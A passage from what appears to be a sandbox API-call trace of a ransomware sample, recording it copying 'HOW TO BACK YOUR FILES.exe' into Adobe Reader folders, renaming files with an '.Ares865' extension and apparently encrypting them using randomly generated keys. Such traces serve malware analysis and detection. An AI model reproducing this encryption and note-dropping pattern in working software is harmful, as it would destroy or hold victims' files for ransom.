lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.317] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.326] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0057.326] GetLastError () returned 0x0 [0057.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.326] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.327] CloseHandle (hObject=0x154) returned 1 [0057.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.327] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf1a9e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81f24da0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81f24da0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.328] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.328] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.328] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.Ares865") returned 77 [0057.328] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat.ares865"), dwFlags=0x1) returned 1 [0057.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.CAT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0057.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=312320) returned 1 [0057.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.332] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0057.333] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0057.333] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.333] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4c700, lpName=0x0) returned 0x15c [0057.336] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c700) returned 0x420000 [0057.368] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0057.368] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0057.369] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.369] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.369] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0057.372] CloseHandle (hObject=0x15c) returned 1 [0057.372] CloseHandle (hObject=0x118) returned 1 [0057.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.378] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8ec4a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4bc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AcroPDF.CHS", cAlternateFileName="")) returned 1 [0057.378] lstrcmpiW (lpString1="AcroPDF.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.378] lstrcmpiW (lpString1="AcroPDF.CHS", lpString2="aoldtz.exe") returned -1 [0057.378] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.Ares865") returned 78 [0057.379] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat.ares865"), dwFlags=0x1) returned 1 [0057.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\PDFShell.CAT.Ares865" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\pdfshell.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0057.442] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=301056) returned 1 [0057.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0057.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0057.442] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0057.443] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0057.443] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.443] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x49b00, lpName=0x0) returned 0x120 [0057.445] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49b00) returned 0x420000 [0057.658] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0057.658] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0057.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0057.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.659] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0057.662] CloseHandle (hObject=0x120) returned 1 [0057.662] CloseHandle (hObject=0x12c) returned 1 [0057.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0057.666] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0057.668] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8058e120, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x49400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PDFShell.CHS", cAlternateFileName="")) returned 1 [0057.668] lstrcmpiW (lpString1="PDFShell.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.668] lstrcmpiW (lpString1="PDFShell.CHS", lpString2="aoldtz.exe") returned 1 [0057.669] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0057.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5fb8 | out: hHeap=0x2b0000) returned 1 [0057.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0057.669] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe") returned 28 [0057.669] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0057.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.673] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e1eea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.674] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0" [0057.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0057.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0057.674] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned 40 [0057.674] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0" [0057.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.678] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e1eea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.678] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.694] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" [0057.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.694] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0057.694] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned 52 [0057.695] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" [0057.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.699] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.699] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e45000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e45000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.699] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.699] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.700] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" [0057.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0057.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0057.700] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned 91 [0057.700] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" [0057.700] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.700] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.706] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.706] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e6b160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e6b160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.706] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.706] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.727] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" [0057.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0057.727] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0057.727] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource") returned 49 [0057.727] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource" [0057.727] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.727] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.735] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.735] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" [0057.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0057.735] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0057.735] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport") returned 61 [0057.735] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport" [0057.735] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.735] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.741] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.741] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.741] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.741] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.741] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" [0057.741] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0057.742] HeapFree (in: 